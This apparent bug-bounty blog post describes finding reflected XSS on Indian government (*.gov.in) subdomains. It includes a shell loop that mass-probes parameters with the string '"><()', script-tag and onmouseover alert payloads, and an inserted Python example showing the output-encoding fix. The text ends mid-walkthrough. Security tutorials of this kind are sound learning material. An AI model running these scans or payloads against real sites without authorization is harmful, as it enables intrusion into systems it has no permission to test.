How I found Reflected XSS on *.GOV.IN
This post walks through how to find the parameters a web application exposes and which of them are vulnerable. It also shows how vulnerabilities such as XSS and SQLi are found and exploited once you approach a site this way.
What is Reflected XSS:
Reflected cross-site scripting (XSS) is a vulnerability that occurs when an application receives data in an HTTP request and includes it in the immediate response without properly filtering or encoding it.
Let's go step by step:
Select the domain: *.gov.in
Step 1: Find all possible subdomains under the selected domain
Step 2: Select any one subdomain
Step 3: Find all possible parameters using a tool such as ParamSpider
Step 4: Examine all URLs that directly reflect special characters.
To automate this, use the script below:
# Drop static assets, replace every query value with the probe string '"><()', and save the list.
cat urls.txt \
  | egrep -iv '\.(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)' \
  | qsreplace '"><()' \
  | tee combinedfuzz.json \
# Fetch each probed URL and check whether the probe comes back verbatim in the response body.
&& cat combinedfuzz.json | while read -r host; do
     curl --silent --path-as-is --insecure "$host" | grep -qs '"><()' \
       && echo -e "$host \033[91m Vulnerable \e[0m \n" \
       || echo -e "$host \033[92m Not Vulnerable \e[0m \n"
   done | tee XSS.txt
The script flags these parameters as Vulnerable:
Step 5: Now try it manually:
Let's try a basic XSS payload:
"><script>alert(1);</script>
Doesn't work:
No pop-up:
Let's start from the beginning:
Just try a single quote:
'
No input validation or sanitization is present:
Now try an event handler:
' onmouseover=alert(1);>
Hover your mouse over the links after entering the payload to have it executed.
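As an added example (not code from the original post or from the site in question), the following Python reproduces offline both what the scan script decides and what the single-quote test shows: a constructed handler that reflects a query parameter verbatim, beside the same handler with output encoding, plus a scan that mirrors the egrep filter, the qsreplace substitution and the grep check. The handler names, the example.test URLs and the q parameter are assumptions made for the illustration.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# Probe string used by the scan above: characters that must never reach HTML unescaped.
PROBE = '"><()'

# Extensions the scan skips (same list as the egrep filter above).
STATIC_EXT = ("jpg", "jpeg", "js", "css", "gif", "tif", "tiff", "png",
              "woff", "woff2", "ico", "pdf", "svg", "txt")


def is_static(url):
    # Mirrors the egrep filter: skip URLs whose path ends in a static-asset extension.
    path = urlsplit(url).path.lower()
    return path.rsplit(".", 1)[-1] in STATIC_EXT if "." in path else False


def render_vulnerable(params):
    # Constructed handler standing in for the target page: the 'q' parameter is
    # reflected verbatim into a single-quoted attribute and into the element body.
    q = params.get("q", "")
    return f"<a href='/search?q={q}'>{q}</a>"


def render_fixed(params):
    # Same handler with output encoding. quote=True turns ' and " into entities as
    # well as < > &, so the value can neither close the attribute (') nor the tag (>).
    q = html.escape(params.get("q", ""), quote=True)
    return f"<a href='/search?q={q}'>{q}</a>"


def probe_params(url, probe=PROBE):
    # Mirrors qsreplace: every query value is replaced by the probe string.
    return {k: probe for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)}


def is_reflected(url, renderer, probe=PROBE):
    # Same decision the curl | grep loop makes: does the probe appear verbatim in
    # the response body? Encoded output turns '"><()' into '&quot;&gt;&lt;()'.
    return probe in renderer(probe_params(url, probe))


def scan(urls, renderer):
    # Full pipeline: filter static files, probe each remaining URL, label the result.
    return {u: ("Vulnerable" if is_reflected(u, renderer) else "Not Vulnerable")
            for u in urls if not is_static(u)}


if __name__ == "__main__":
    # Constructed URLs; example.test is a reserved documentation domain.
    urls = ["https://example.test/page?q=hello", "https://example.test/logo.png?v=1"]
    print(scan(urls, render_vulnerable))   # page?q=hello -> Vulnerable, logo.png skipped
    print(scan(urls, render_fixed))        # page?q=hello -> Not Vulnerable
    # The single-quote event-handler case from the manual test, neutralized by encoding.
    print(render_fixed({"q": "' onmouseover=alert(1);>"}))
```

The fix is context-aware output encoding at the point of reflection, not input filtering: html.escape with quote=True covers both the quoted-attribute context (where the single quote mattered in the manual test) and the element body (where the probe's angle brackets mattered). Escaping with the default quote=False would leave the attribute break-out intact, which is why the parameter is passed through explicitly.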
Let's look at the source code: